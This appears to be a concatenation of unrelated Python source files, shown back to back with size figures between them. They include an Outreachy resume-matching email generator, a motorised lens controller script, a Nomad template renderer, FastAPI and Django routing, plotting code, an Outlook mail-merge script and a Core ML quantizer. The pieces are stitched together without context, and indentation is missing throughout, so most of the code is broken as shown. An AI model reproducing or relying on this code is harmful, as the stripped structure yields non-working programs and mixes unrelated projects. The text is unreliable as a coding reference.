#if resumeCount:
# print(len(resumeCount), 'with > 10 matches')
#print('Resumes with weak matches:')
#for i in range(1, 9):
# resumeCount = [resume for resume in resumeFiles
# if not resume.strongProjectMatches and len(resume.weakProjectMatches) == i]
# if resumeCount:
# print(len(resumeCount), 'with', i, 'weak matches')
#resumeCount = [resume for resume in resumeFiles
# if not resume.strongProjectMatches and len(resume.weakProjectMatches) > 9]
#if resumeCount:
# print(len(resumeCount), 'with > 10 matches')
header1 = '''From: Sarah Sharp <saharabeara@gmail.com>
'''
header3 = '''Reply-to: outreachy-admins@gnome.org
Subject: Internship opportunities
'''
noBooth = '''Greetings!
I'm Sarah Sharp, and we both attended the Tapia conference last
September. I'd like to invite you to apply to two programs programs
that provide paid internships in open source. Interns will work
remotely with experienced mentors.
'''
# offer to host Outreachy session if they signed up at the booth or mention open
# source in their resume?
# What about the students at universities hosting introductory sessions?
atBooth = '''Greetings!
I'm Sarah Sharp, and we met when you stopped by the Outreachy booth
at the Tapia conference last September. I'd like to invite you to
apply to two programs programs that provide paid internships.
Interns will work remotely with experienced mentors.
'''
generalInfo = '''Google Summer of Code is open to all university students:
https://developers.google.com/open-source/gsoc/
Outreachy is open internationally to women (both cis & trans),
trans men, and genderqueer folks. It is also open to U.S. residents
and nationals of any gender who are Black/African American,
Hispanic/Latin@, American Indian, Alaska Native, Native Hawaiian, or
Pacific Islander.
https://wiki.gnome.org/Outreachy/
Both programs offer internships from May 30 to August 30.
Google Summer of Code application process runs from Feb 28 to Apr 3,
while Outreachy's application process runs from Feb 16 to Mar 30.
Google Summer of Code application only requires a project proposal.
Outreachy also requires applicants to make project contributions.
'''
moreInfo = '''The full list of Outreachy internship projects is available at:
https://wiki.gnome.org/Outreachy/2017/MayAugust
Please let me know if you have any questions about the Outreachy
program. Outreachy coordinators (Marina, Karen, Cindy, Tony, and I)
can all be reached at outreachy-admins@gnome.org You can contact all
organization mentors by emailing outreachy-list@gnome.org
I hope you'll apply!
Thanks,
Sarah Sharp
'''
# TODO:
# 1. Remove the generic description when we have a good resume match; it's more personal.
LINEWRAP = 68
def writeInitialInvitation(emaildir, resume, boothlist, matches):
project, keywords = matches[0]
para = ("Based on your resume, if you're eligible for Outreachy, it looks like you might be a good fit for in an internship with " +
project.name)
if project.short:
para = para +' (' + project.short + ')'
if not project.description:
return textwrap.fill(para + '.', LINEWRAP, replace_whitespace=False) + '\n\n'
para = para + ' which is offering an internship to ' + project.description
keywords = [k for k in keywords if k.lower() not in project.printskip]
if keywords:
para = para + ' that involves working with '
k = list(set(keywords))
if len(k) == 1:
para = para + k[0]
elif len(k) == 2:
para = para + ' and '.join(k)
else:
para = para + ', '.join(k[:-1]) + ' and ' + k[-1]
return para
def writeStrongInvitation(emaildir, resume, boothlist):
matches = sorted(resume.strongProjectMatches, key=lambda match: len(match[1]))
project, keywords = matches[0]
para = writeInitialInvitation(emaildir, resume, boothlist, matches)
if len(resume.strongProjectMatches) > 1:
para = (para + '. You may also be interested in the ' +
project.name + ' internship')
if len(resume.strongProjectMatches) > 2:
para = para + 's to '
else:
para = para + ' to '
descriptions = []
for project, keywords in matches[1:-1]:
para = para + project.description + ' or the internship to '
para = para + matches[-1][0].description
return textwrap.fill(para + '.', LINEWRAP) + '\n\n'
def writeMultipleStrongInvitation(emaildir, resume, boothlist):
matches = sorted(resume.strongProjectMatches, key=lambda match: len(match[1]))
project, keywords = matches[0]
para = writeInitialInvitation(emaildir, resume, boothlist, matches)
doneProjects = set()
for project, keywords in matches[1:]:
projmatches = [(p, k) for p, k in matches[1:]
if p not in doneProjects and
p.name == project.name
]
if not projmatches:
continue
doneProjects.add(project)
for p, k in projmatches:
para = (para + '. You may also be interested in the ' +
p.name + ' internship')
if not p.description:
break
if len(projmatches) > 2:
para = para + 's to '
else:
para = para + ' to '
descriptions = []
for p2, k2 in projmatches[1:-1]:
para = para + p2.description + ' or the internship to '
para = para + projmatches[-1][0].description
return textwrap.fill(para + '.', LINEWRAP) + '\n\n'
class emailType(Enum):
strong = 1
mixed = 2
weak = 3
def craftEmail(emaildir, resume, boothlist, strength):
email = header1 + 'To: ' + ', '.join(resume.emails) + '\n' + header3
if resume.pdfFileName in boothlist:
email = email + atBooth
else:
email = email + noBooth
if strength is emailType.strong:
email = (email + generalInfo +
writeStrongInvitation(emaildir, resume, boothlist) +
moreInfo)
elif strength is emailType.mixed:
email = (email + generalInfo +
writeMultipleStrongInvitation(emaildir, resume, boothlist) +
moreInfo)
ext = '-email.txt'
with open(os.path.join(emaildir, os.path.splitext(resume.textFileName)[0] + ext), 'w') as f:
f.write(email)
def createFormEmails(directory, resumeFiles, boothlist):
# For all resumes with one strong match or multiple strong matches with the same organization:
# Create a directory with the organization name (lowercase, with spaces replaced with dashes)
# Copy pdf resume into that directory, create basename-email.txt
oneStrong = [resume for resume in resumeFiles if len(resume.strongProjectMatches) == 1]
print('Resumes with exactly one match:', len(oneStrong))
left = [resume for resume in resumeFiles if resume not in oneStrong]
for resume in left:
if not resume.strongProjectMatches:
continue
firstMatch = resume.strongProjectMatches[0][0].name
for match in resume.strongProjectMatches[1:]:
if match[0].name != firstMatch:
firstMatch = ''
break
if firstMatch:
oneStrong.append(resume)
left = [resume for resume in resumeFiles if resume not in oneStrong]
print('Resumes with exactly one match or multiple matches with same org:', len(oneStrong))
print('Other resumes:', len(left))
for project in projectsMay2017:
matches = [resume for resume in oneStrong if resume.strongProjectMatches[0][0].name == project.name]
if not matches:
continue
dirpath = os.path.join(directory, 'emails-' + re.sub(r'\s+', '-', project.name.lower()))
if not os.path.exists(dirpath):
os.makedirs(dirpath)
for resume in matches:
try:
if not os.path.exists(os.path.join(dirpath, resume.pdfFileName)):
copyfile(os.path.join(directory, resume.pdfFileName),
os.path.join(dirpath, resume.pdfFileName))
except:
print('Could not find pdf file for', resume.textFileName)
continue
craftEmail(dirpath, resume, boothlist, emailType.strong)
# For all resumes with strong matches with multiple orgs (but less than 4 orgs):
# Create a directory called strong-mixed.
# Copy pdf resume into that directory, create basename-email.txt
#
# "Based on your resume, it looks like you might be interested in an
# internship with $PROJECT that involves $KEYWORDS which is offering an internship for
# $DESCRIPTION.
#
# Additionally, you might be interested in $PROJECT that involves $KEYWORDS which
# is offering an internship for $DESCRIPTION."
mixed = [resume for resume in resumeFiles if resume not in oneStrong and resume.strongProjectMatches]
dirpath = os.path.join(directory, 'mixed')
if not os.path.exists(dirpath):
os.makedirs(dirpath)
for resume in mixed:
try:
if not os.path.exists(os.path.join(dirpath, resume.pdfFileName)):
copyfile(os.path.join(directory, resume.pdfFileName),
os.path.join(dirpath, resume.pdfFileName))
except:
print('Could not find pdf file for', resume.textFileName)
continue
craftEmail(dirpath, resume, boothlist, emailType.mixed)
# For all resumes with strong matches with 4 or more orgs:
# Create a directory called strong-scattered.
# Copy pdf resume into that directory, create basename-email.txt
# For all weakly matched resumes - figure out top keywords that matched weak resumes.
hitcount = Counter()
for resume in [resume for resume in resumeFiles if not resume.strongProjectMatches]:
allkeywords = set()
for project, keywords in resume.weakProjectMatches:
allkeywords.update(keywords)
for keyword in keywords:
allkeywords.add(keyword)
hitcount.update(allkeywords)
# Take the top N keywords that weakly matched, find all projects that matched those keywords.
# "Based on your resume, it looks like you might be interested in Outreachy
# projects involving $KEYWORD like $MATCHES"
def craftGenericEmail(emaildir, resume):
if not resume.emails:
address = ''
else:
address = resume.emails[0]
email = header1 + 'To: ' + address + '\n' + header3
email = email + noBooth
email = (email + generalInfo + moreInfo)
ext = '-email.txt'
with open(os.path.join(emaildir, os.path.splitext(resume.textFileName)[0] + ext), 'w') as f:
f.write(email)
def main():
parser = argparse.ArgumentParser(description='Search text resume files for skillset matches.')
parser.add_argument('dir', help='Directory with .txt resume files')
parser.add_argument('--csv', help='CSV file with name <email>,matching resume file of people who stopped by the booth')
parser.add_argument('--notus', help='Directory with .txt resumes files that may be non-U.S. residents')
parser.add_argument('--done', help='Directory with .txt resume files that have been contacted')
parser.add_argument('--generic', help='Simply create generic emails and ignore project matches', default=False)
#parser.add_argument('matches', help='file to write potential matches to')
args = parser.parse_args()
resumeFiles = readResumeFiles(args.dir)
# Check to see if we have resumes to process that we've already
# send email to.
if args.done:
doneResumes = readResumeFiles(args.done)
emails = [resume.emails[0] for resume in doneResumes if resume.emails]
for email in emails:
pdfs = [resume.pdfFileName for resume in resumeFiles if resume.emails and resume.emails[0] == email]
matches = [resume.pdfFileName for resume in doneResumes if resume.emails and resume.emails[0] == email]
if pdfs:
print('Already contacted:', email, ' '.join(pdfs), 'matches done resume', ' '.join(matches))
if args.notus:
notusResumes = readResumeFiles(args.notus)
if args.generic:
genericdir = os.path.join(args.dir, 'generic-todo')
if not os.path.exists(genericdir):
os.makedirs(genericdir)
for resume in resumeFiles:
craftGenericEmail(genericdir, resume)
return
boothstops = (searchForEmail(args.csv, resumeFiles) +
searchForEmail(args.csv, doneResumes) +
searchForEmail(args.csv, notusResumes))
boothlist = set()
for email, filelist in boothstops:
boothlist.update(filelist)
print('Booth stop list', boothstops)
print('Booth stop pdfs', boothlist)
print('Done resumes', [resume.pdfFileName for resume in doneResumes])
matchWithProjects(resumeFiles)
boothandresume = len([resume for resume in resumeFiles
if resume.pdfFileName in boothlist
and len(resume.strongProjectMatches)])
print('People who stopped by the booth who have a resume and need an email:', boothandresume)
print('People who stopped by the booth who have a resume and have been sent email:',
len([resume for resume in doneResumes
if resume.pdfFileName in boothlist]))
print('People who stopped by the booth who have a resume and may be non-U.S. citizens:',
len([resume for resume in notusResumes
if resume.pdfFileName in boothlist]))
createFormEmails(args.dir, resumeFiles, boothlist, generic)
if __name__ == "__main__":
main()
| 31,892 | 9,044 |
import cv2
import os
import serial
import sys
import scf4_tools
import time
import threading
import camera
import numpy as np
from scipy.interpolate import interp1d
from tqdm import tqdm
CHB_MOVE = 7
CHA_MOVE = 6
CHB_PI = 4
CHA_PI = 3
def parse_data(data):
out_x = []
out_y = []
for i in data:
p2 = i.split(" ")
out_x.append(int(p2[0]))
out_y.append(int(p2[1]))
return out_x, out_y
def scale(val, src, dst):
return ((val - src[0]) / (src[1]-src[0])) * (dst[1]-dst[0]) + dst[0]
ser = serial.Serial()
ser.port = 'COM231' # Controller com port
ser.baudrate = 115200 # BAUD rate when connected over CDC USB is not important
ser.timeout = 5 # max timeout to wait for command response
print("Open COM port:", ser.port)
ser.open()
ser.flushInput()
ser.flushOutput()
c = camera.Cam()
print("Starting cam")
c.start()
print("Waiting for camera")
while c.fps == 0:
time.sleep(0.1) # should be implemented with queue/signals but good enough for testing
print("Cam is operational")
c.set_cam_text("Prepare")
print("Read controller version strings")
scf4_tools.send_command(ser, "$S", echo=True)
print("Initialize controller")
scf4_tools.send_command(ser, "$B2", echo=True)
print("# Set motion to forced mode")
scf4_tools.send_command(ser, "M231 A", echo=True)
print("Set stepping mode")
scf4_tools.send_command(ser, "M243 C6", echo=True)
print("Set normal move")
scf4_tools.send_command(ser, 'M230', echo=True)
print("Set to rel movement mode")
scf4_tools.send_command(ser, 'G91', echo=True)
print("Energize PI leds")
scf4_tools.send_command(ser, "M238", echo=True)
print("Set motor power")
scf4_tools.send_command(ser, "M234 A190 B190 C190 D90", echo=True)
print("Set motor sleep power")
scf4_tools.send_command(ser, "M235 A120 B120 C120", echo=True)
print("Set motor drive speed")
scf4_tools.send_command(ser, "M240 A600 B600 C600", echo=True)
print("Set PI low/high detection voltage")
scf4_tools.send_command(ser, "M232 A400 B400 C400 E700 F700 G700", echo=True)
print("Filter = VIS")
scf4_tools.send_command(ser, "M7", echo=True)
c.set_cam_text("Homing A")
print()
print("Home axis A")
print("Get status")
status_str = scf4_tools.send_command(ser, "!1")
status = scf4_tools.parse_status(status_str)
print(status_str)
if status[3] == 0:
print("Dir 1")
scf4_tools.send_command(ser, "G91")
scf4_tools.send_command(ser, "M231 A") # Set motion to forced mode
scf4_tools.send_command(ser, "G0 A+100")
scf4_tools.wait_homing(ser, status[CHA_PI], CHA_PI)
else:
print("Dir 2")
scf4_tools.send_command(ser, "G91")
scf4_tools.send_command(ser, "M231 A") # Set motion to forced mode
scf4_tools.send_command(ser, "G0 A-100")
scf4_tools.wait_homing(ser, status[CHA_PI], CHA_PI) # Wait until homing is over
print("Motor normal mode")
scf4_tools.send_command(ser, "M230 A") # Set motion back to normal mode
scf4_tools.send_command(ser, "G0 A-200")
scf4_tools.wait_homing(ser, 1, CHA_MOVE) # Wait until homing is over
print("Motor forced mode")
scf4_tools.send_command(ser, "G91")
scf4_tools.send_command(ser, "M231 A") # Set motion to forced mode
scf4_tools.send_command(ser, "G0 A+100")
scf4_tools.wait_homing(ser, status[CHA_PI], CHA_PI) # Wait until homing is over
print("Set current coordinate as middle")
scf4_tools.send_command(ser, "G92 A32000") # set current coordinate to 32000
scf4_tools.send_command(ser, "M230 A") # Set motion back to normal mode
scf4_tools.send_command(ser, "G90")
c.set_cam_text("Homing B")
print()
print("Home axis B")
print("Get status")
status_str = scf4_tools.send_command(ser, "!1")
status = scf4_tools.parse_status(status_str)
print(status_str)
if status[4] == 0:
print("Dir 1")
scf4_tools.send_command(ser, "G91")
scf4_tools.send_command(ser, "M231 B") # Set motion to forced mode
scf4_tools.send_command(ser, "G0 B+100")
scf4_tools.wait_homing(ser, status[CHB_PI], CHB_PI)
else:
print("Dir 2")
scf4_tools.send_command(ser, "G91")
scf4_tools.send_command(ser, "M231 B") # Set motion to forced mode
scf4_tools.send_command(ser, "G0 B-100")
scf4_tools.wait_homing(ser, status[CHB_PI], CHB_PI) # Wait until homing is over
print("Motor normal mode")
scf4_tools.send_command(ser, "M230 B") # Set motion back to normal mode
scf4_tools.send_command(ser, "G0 B-200")
scf4_tools.wait_homing(ser, 1, CHB_MOVE) # Wait until homing is over
print("Motor forced mode")
scf4_tools.send_command(ser, "G91")
scf4_tools.send_command(ser, "M231 B") # Set motion to forced mode
scf4_tools.send_command(ser, "G0 B+100")
scf4_tools.wait_homing(ser, status[CHB_PI], CHB_PI) # Wait until homing is over
print("Set current coordinate as middle")
scf4_tools.send_command(ser, "G92 B32000") # set current coordinate to 32000
scf4_tools.send_command(ser, "M230 B") # Set motion back to normal mode
scf4_tools.send_command(ser, "G90")
with open('line_inf2.txt') as f:
lines = f.readlines()
x, y = parse_data(lines)
x, y = parse_data(lines)
xi = np.linspace(min(x), max(x), num=max(x)-min(x), endpoint=True)
yi = interp1d(x, y, kind='cubic')
new_list2 = []
for i in range(min(x), max(x), 10):
y = float(np.asarray(yi(i)))
new_list2.append((i, y))
# reverse motion directon (from wide to narrow)
new_list2 = new_list2[::-1]
print("Set motor drive speed")
scf4_tools.send_command(ser, "M240 A500 B500 C500", echo=True)
c.set_cam_text("Moving to wide angle")
(x, y) = new_list2[0]
scf4_tools.send_command(ser, "G0 A"+str(x))
scf4_tools.wait_homing(ser, 1, CHA_MOVE) # Wait until homing is over
scf4_tools.send_command(ser, "G0 B"+str(y))
scf4_tools.wait_homing(ser, 1, CHB_MOVE) # Wait until homing is over
print("Done")
time.sleep(1)
for i in tqdm(range(len(new_list2))):
(x, y) = new_list2[i]
zoom = round(scale(x, (39800, 22600), (5.5, 95)), 1)
c.set_cam_text("Focal length: "+str(zoom)+"mm")
scf4_tools.send_command(ser, "G0 A"+str(x)+ " B"+str(y))
time.sleep(0.001)
c.set_cam_text("Sleeping 10s")
time.sleep(10)
f.close()
time.sleep(10)
c.stop()
| 6,292 | 2,671 |
# Import
from .EchoTextClassifier import EchoTextClassifier
| 61 | 20 |
import subprocess
import logging
import os
from pathlib import Path
from ..docker import docker
import jinja2
log = logging.getLogger(__name__)
TEMPLATES = Path(__file__).parent.parent.parent.resolve() / 'templates'
def set_volumes_paths(substitutions={}):
"""Sets the volumes paths in the job options
:param substitutions: dictionary containing the job options
:returns: the job options
:rtype: dict
"""
from ..configuration import config
substitutions['config'] = config
substitutions['liquid_domain'] = config.liquid_domain
substitutions['liquid_volumes'] = config.liquid_volumes
substitutions['liquid_collections'] = config.liquid_collections
substitutions['liquid_http_port'] = config.liquid_http_port
substitutions['liquid_2fa'] = config.liquid_2fa
substitutions['check_interval'] = config.check_interval
substitutions['check_timeout'] = config.check_timeout
substitutions['consul_url'] = config.consul_url
substitutions['exec_command'] = docker.exec_command_str
substitutions['https_enabled'] = config.https_enabled
if config.https_enabled:
substitutions['liquid_https_port'] = config.liquid_https_port
substitutions['acme_email'] = config.https_acme_email
substitutions['acme_caServer'] = config.https_acme_caServer
repos = {
'snoop2': {
'org': 'hoover',
'local': os.path.join(config.liquidinvestigations_repos_path, 'hoover-snoop2'),
'target': '/opt/hoover/snoop'
},
'search': {
'org': 'hoover',
'local': os.path.join(config.liquidinvestigations_repos_path, 'hoover-search'),
'target': '/opt/hoover/search'
},
'ui_src': {
'org': 'hoover',
'local': os.path.join(config.liquidinvestigations_repos_path, 'hoover-ui/src'),
'target': '/opt/hoover/ui/src'
},
'ui_pages': {
'org': 'hoover',
'local': os.path.join(config.liquidinvestigations_repos_path, 'hoover-ui/pages'),
'target': '/opt/hoover/ui/pages'
},
'ui_styles': {
'org': 'hoover',
'local': os.path.join(config.liquidinvestigations_repos_path, 'hoover-ui/styles'),
'target': '/opt/hoover/ui/styles'
},
'core': {
'org': 'liquidinvestigations',
'local': os.path.join(config.liquidinvestigations_repos_path, 'core'),
'target': '/app'
},
'authproxy': {
'org': 'liquidinvestigations',
'local': os.path.join(config.liquidinvestigations_repos_path, 'authproxy'),
'target': '/app'
},
'codimd_server': {
'org': 'liquidinvestigations',
'local': os.path.join(config.liquidinvestigations_repos_path, 'codimd-server'),
'target': '/app',
},
'dokuwiki': {
'org': 'liquidinvestigations',
'local': os.path.join(config.liquidinvestigations_repos_path, 'liquid-dokuwiki'),
'target': '/liquid',
},
}
for repo, repo_config in repos.items():
key_repo = f"{repo_config['org']}_{repo}_repo"
key_git = f"{repo_config['org']}_{repo}_git"
substitutions[key_repo] = ''
substitutions[key_git] = ''
if config.mount_local_repos:
if Path(repo_config['local']).is_dir():
substitutions[key_repo] = f"\"{repo_config['local']}:{repo_config['target']}\",\n"
tag = subprocess.check_output(
f"git -C {repo_config['local']} describe --tags --dirty --broken",
shell=True,
).decode('utf-8').strip()
md5sum = subprocess.check_output(
f"git -C {repo_config['local']} diff HEAD | md5sum",
shell=True,
).decode('utf-8').strip()
substitutions[key_git] = tag + md5sum
else:
log.warn(f'Invalid repo path "{repo_config["local"]}"')
return substitutions
def render(template, subs):
from ..configuration import config
env = jinja2.Environment(
variable_start_string="${",
variable_end_string="}",
loader=jinja2.FileSystemLoader(str(config.templates)),
)
env.globals['int'] = int
env.globals['max'] = max
return env.from_string(template).render(subs)
def get_job(hcl_path, substitutions={}):
"""Return the job description generated from the given template
:param hcl_path: the path to the hcl template file
:param substitutions: dictionary containing the job options
:returns: the job description
:rtype: str
"""
with hcl_path.open() as job_file:
template = job_file.read()
output = render(template, set_volumes_paths(substitutions))
return output
class Job:
vault_secret_keys = ()
core_oauth_apps = ()
stage = 2
generate_oauth2_proxy_cookie = False
extra_secret_fn = None
| 5,053 | 1,550 |
import morepath
class app(morepath.App):
pass
class StaticMethod(object):
pass
class Root(object):
def __init__(self):
self.value = 'ROOT'
@staticmethod
@app.path(model=StaticMethod, path='static')
def static_method():
return StaticMethod()
@app.view(model=StaticMethod)
def static_method_default(self, request):
return "Static Method"
| 389 | 125 |
from django.urls import include
from django.conf.urls import url
from rest_framework.routers import SimpleRouter
from rest_framework_nested.routers import NestedSimpleRouter
from .views import (
HostViewSet,
HostAdminViewSet,
ClusterViewSet,
InfobaseViewSet,
)
host_router = SimpleRouter()
host_router.register(r'hosts', HostViewSet, basename='host')
host_admin_router = NestedSimpleRouter(host_router, r'hosts', lookup='host')
host_admin_router.register(r'admins', HostAdminViewSet, basename='host-admin')
cluster_router = NestedSimpleRouter(host_router, r'hosts', lookup='host')
cluster_router.register(r'clusters', ClusterViewSet, basename='cluster')
infobase_router = NestedSimpleRouter(cluster_router, r'clusters', lookup='cluster')
infobase_router.register(r'infobases', InfobaseViewSet, basename='infobase')
urlpatterns = [
url(r'^', include(host_router.urls)),
url(r'^', include(host_admin_router.urls)),
url(r'^', include(cluster_router.urls)),
url(r'^', include(infobase_router.urls)),
]
| 1,035 | 338 |
import matplotlib.pyplot as plt
import imageio
import os
import numpy as np
class GIFPloter():
def __init__(self, args, model):
self.plot_method = 'Li'
self.gif_axlist = []
self.clist = ['r', 'g', 'b', 'y', 'm', 'c', 'k',
'pink', 'lightblue', 'lightgreen', 'grey']
self.fig, self.ax = plt.subplots()
self.his_loss = None
self.NetworkStructure = args['NetworkStructure']
self.current_subfig_index = 2
self.plot_every_epoch = args['PlotForloop']
self.infor_index_list = model.plot_index_list
self.name_list = model.name_list
self.num_subfig = len(model.plot_index_list)
self.layer_num = len(args['NetworkStructure']) - 1
if self.plot_method == 'Zang':
self.num_fig_every_row = int(np.sqrt(self.num_subfig))+1
self.num_row = int(1+(self.num_subfig - 0.5) //
self.num_fig_every_row)
self.sub_position_list = [i+1 for i in range(self.num_subfig)]
if self.plot_method == 'Li':
self.num_fig_every_row = 2
self.num_row = int(1+(self.num_subfig - 0.5) //
self.num_fig_every_row)
self.sub_position_list = [i*2 + 1 for i in range(self.num_subfig//2)] +\
[self.num_subfig] + \
list(reversed([i*2 + 2 for i in range(self.num_subfig//2)]))
def PlotOtherLayer(self, fig,
data, label,
title='',
fig_position0=1,
fig_position1=1,
fig_position2=1,
s=8):
from sklearn.decomposition import PCA
# input(fig_position)
color_list = []
for i in range(label.shape[0]):
color_list.append(int(label[i]))
if data.shape[1] > 3:
pca = PCA(n_components=2)
try:
data_em = pca.fit_transform(data)
except:
print("Error in plot latent space: PCA.")
data_max = np.max(data) if np.max(data) < 1e30 else 1e30
data_min = np.min(data) if np.min(data) > 1e-5 else 1e-2
data -= data_min
data /= data_max
data_em = pca.fit_transform(data)
else:
data_em = data
data_em = data_em - data_em.mean(axis=0)
if data_em.shape[1] == 3:
ax = fig.add_subplot(fig_position0, fig_position1,
fig_position2, projection='3d')
ax.scatter(
data_em[:, 0], data_em[:, 1], data_em[:, 2],
c=color_list, s=s, cmap='rainbow')
if data_em.shape[1] == 2:
ax = fig.add_subplot(fig_position0, fig_position1, fig_position2)
ax.scatter(
data_em[:, 0], data_em[:, 1], c=label, s=s, cmap='rainbow')
plt.axis('equal')
plt.title(title)
self.current_subfig_index = self.current_subfig_index+1
def update_loss(self, loss=None):
""" 0721, append loss list """
if self.his_loss is None and loss is not None:
self.his_loss = [[] for i in range(len(loss))]
elif loss is not None:
for i, loss_item in enumerate(loss):
self.his_loss[i].append(loss_item)
def AddNewFig(self, output_info, label_point, loss=None, title_='', save=True):
self.update_loss(loss)
self.current_subfig_index = 1
fig = plt.figure(figsize=(5*self.num_fig_every_row, 5*self.num_row))
for i, index in enumerate(self.infor_index_list):
self.PlotOtherLayer(
fig, output_info[index],
label_point, title=self.name_list[index],
fig_position0=self.num_row,
fig_position1=self.num_fig_every_row,
fig_position2=int(self.sub_position_list[i]))
if loss is not None:
loss_interval = 200
loss_sum = []
for i in range(len(self.his_loss[1])):
tmp = 0
for j in range(len(self.his_loss)):
try:
tmp += self.his_loss[j][i]
except:
pass
loss_sum.append(tmp)
# add new subplot
ax = fig.add_subplot(self.num_row, self.num_fig_every_row,
int(max(self.sub_position_list))+1)
l1, = ax.plot(
[i*loss_interval for i in range(len(self.his_loss[0]))],
self.his_loss[0], 'bo-')
l2, = ax.plot(
[i*loss_interval for i in range(len(self.his_loss[0]))],
self.his_loss[1], 'ko-')
l3, = ax.plot(
[i*loss_interval for i in range(len(self.his_loss[0]))],
self.his_loss[2], 'yo-')
l4, = ax.plot(
[i*loss_interval for i in range(len(self.his_loss[0]))],
self.his_loss[3], 'ro-')
l5, = ax.plot(
[i*loss_interval for i in range(len(self.his_loss[0]))],
self.his_loss[4], 'mo-')
l6, = ax.plot(
[i*loss_interval for i in range(len(self.his_loss[0]))],
self.his_loss[5], 'go-')
l7, = ax.plot(
[i*loss_interval for i in range(len(self.his_loss[0]))],
loss_sum, 'co-')
ax.legend((l1, l2, l3, l4, l5, l6, l7),
('dis', 'push', 'ang', 'orth', 'pad', 'ae', 'sum'))
# loss
plt.title('loss history')
plt.tight_layout()
if save:
plt.savefig(title_+'.png', dpi=300)
plt.close()
def SaveGIF(self, path):
gif_images_path = os.listdir(path+'/')
gif_images_path.sort()
print(gif_images_path)
gif_images = []
for _, path_ in enumerate(gif_images_path):
print(path_)
if '.png' in path_:
# print(path+'/'+path_)
gif_images.append(imageio.imread(path+'/'+path_))
imageio.mimsave(path+'/'+"latent.gif", gif_images, fps=10)
| 6,292 | 2,062 |
import logging
import os
import win32com.client
import pandas as pd
logging.basicConfig(level=logging.INFO)
templateName = "Template.msg"
recipientsFile = "Recipients.xlsx"
logging.info('Violet App Start')
path = os.getcwd()
logging.info('Current Directory {}'.format(path))
outlook = win32com.client.Dispatch("Outlook.Application").GetNamespace("MAPI")
mail = outlook.OpenSharedItem(os.path.join(path,templateName))
logging.info("件名: {}".format(mail.subject))
logging.info("本文: {}".format(mail.HTMLBody))
originalBody = mail.HTMLBody
df = pd.read_excel(os.path.join(path,recipientsFile), sheet_name='Recipients')
logging.info(df)
outputDir = os.path.join(path,'output')
if not os.path.isdir(outputDir):
os.mkdir(outputDir)
for index, row in df.iterrows():
replacedBody = originalBody
recipient = ""
for indexName in row.index:
logging.info("indexName {}".format(indexName))
if indexName == "TO":
mail.Recipients.Add(row[indexName])
recipient =row[indexName]
else:
replacedBody = replacedBody.replace(indexName,row[indexName])
mail.HTMLBody = replacedBody
mail.SaveAs(os.path.join(outputDir,"{}.msg".format(recipient.replace("@","_"))))
mail.Recipients.Remove(1)
logging.info('Violet App End') | 1,336 | 464 |
from typing import List
from fastapi import APIRouter
from .. import database, schemas, models, oauth2
from sqlalchemy.orm import Session
from fastapi import APIRouter, Depends, status
from ..repository import backlog
router = APIRouter(prefix="/backlog", tags=["Backlog"])
get_db = database.get_db
@router.get("/", response_model=List[schemas.Backlog])
def get_all(
db: Session = Depends(get_db)):
return backlog.get_all(db)
@router.get("/{id}", status_code=200, response_model=schemas.Backlog)
def get(
id: int,
db: Session = Depends(get_db),
current_user: schemas.User = Depends(oauth2.get_current_user)
):
return backlog.get(id, db)
@router.post("/", status_code=status.HTTP_201_CREATED)
def create(
request: schemas.Backlog,
db: Session = Depends(get_db),
current_user: schemas.User = Depends(oauth2.get_current_user)
):
return backlog.create(request, db)
@router.delete("/{id}", status_code=status.HTTP_204_NO_CONTENT)
def destroy(
id: int,
db: Session = Depends(get_db),
current_user: schemas.User = Depends(oauth2.get_current_user),
):
return backlog.destroy(id, db)
@router.put("/{id}", status_code=status.HTTP_202_ACCEPTED)
def update(
id: int,
request: schemas.Backlog,
db: Session = Depends(get_db),
current_user: schemas.User = Depends(oauth2.get_current_user),
):
return backlog.update(id, request, db)
| 1,409 | 504 |
from typing import Any, Callable, Optional
class cprop:
"""Class property."""
def __init__(self, f: Callable[..., str]):
self.f = f
def __get__(self, obj: Any, owner: Any) -> str:
return self.f(owner)
class Key:
"""Class which manages keys in :class:`anndata.AnnData`."""
@classmethod
def backward(cls, bwd: bool) -> str:
return "bwd" if bwd else "fwd"
@classmethod
def where(cls, bwd: bool) -> str:
return "from" if bwd else "to"
@classmethod
def initial(cls, bwd: bool) -> str:
return "initial" if bwd else "terminal"
@classmethod
def cytotrace(cls, key: str) -> str:
return f"ct_{key}"
class obs:
@classmethod
def probs(cls, key: str) -> str:
return f"{key}_probs"
@classmethod
def macrostates(cls, bwd: bool) -> str:
return f"macrostates_{Key.backward(bwd)}"
@classmethod
def term_states(cls, bwd: bool) -> str:
return f"{Key.initial(bwd)}_states"
@classmethod
def priming_degree(cls, bwd: bool) -> str:
return f"priming_degree_{Key.backward(bwd)}"
class obsm:
@classmethod
def memberships(cls, key: str) -> str:
return f"{key}_memberships"
@classmethod
def schur_vectors(cls, bwd: bool) -> str:
return f"schur_vectors_{Key.backward(bwd)}"
@classmethod
def macrostates(cls, bwd: bool) -> str:
return f"macrostates_{Key.backward(bwd)}"
@classmethod
def abs_probs(cls, bwd: bool) -> str:
return ("from" if bwd else "to") + "_" + Key.obs.term_states(bwd)
@classmethod
def abs_times(cls, bwd: bool) -> str:
return f"absorption_times_{Key.backward(bwd)}"
class varm:
@classmethod
def lineage_drivers(cls, bwd: bool):
return ("initial" if bwd else "terminal") + "_lineage_drivers"
class uns:
@classmethod
def kernel(cls, bwd: bool, key: Optional[str] = None) -> str:
return key if key is not None else f"T_{Key.backward(bwd)}"
@classmethod
def estimator(cls, bwd: bool, key: Optional[str] = None) -> str:
return key if key is not None else f"{Key.backward(bwd)}_estimator"
@classmethod
def names(cls, key: str) -> str:
return f"{key}_names"
@classmethod
def colors(cls, key: str) -> str:
return f"{key}_colors"
@classmethod
def eigen(cls, bwd: bool) -> str:
return f"eigendecomposition_{Key.backward(bwd)}"
@classmethod
def schur_matrix(cls, bwd: bool) -> str:
return f"schur_matrix_{Key.backward(bwd)}"
@classmethod
def coarse(cls, bwd: bool) -> str:
return f"coarse_{Key.backward(bwd)}"
| 2,902 | 972 |
#!/usr/local/bin/python3
import coremltools.models
import coremltools.models.neural_network
import os.path
models_dir = os.path.join(os.path.dirname(__file__), "..", "Solving Bee", "Resources")
for model_name in ["LettersModel", "BoardModel"]:
model_path = os.path.join(models_dir, f"{model_name}.mlmodel")
model_fp32 = coremltools.models.MLModel(model_path)
model_fp16 = coremltools.models.neural_network.quantization_utils.quantize_weights(model_fp32, nbits=16)
model_fp16.save(model_path)
| 510 | 192 |
import pyredner
import redner
import numpy as np
import torch
import math
# Example of optimizing vertex color of a sphere.
# Use GPU if available
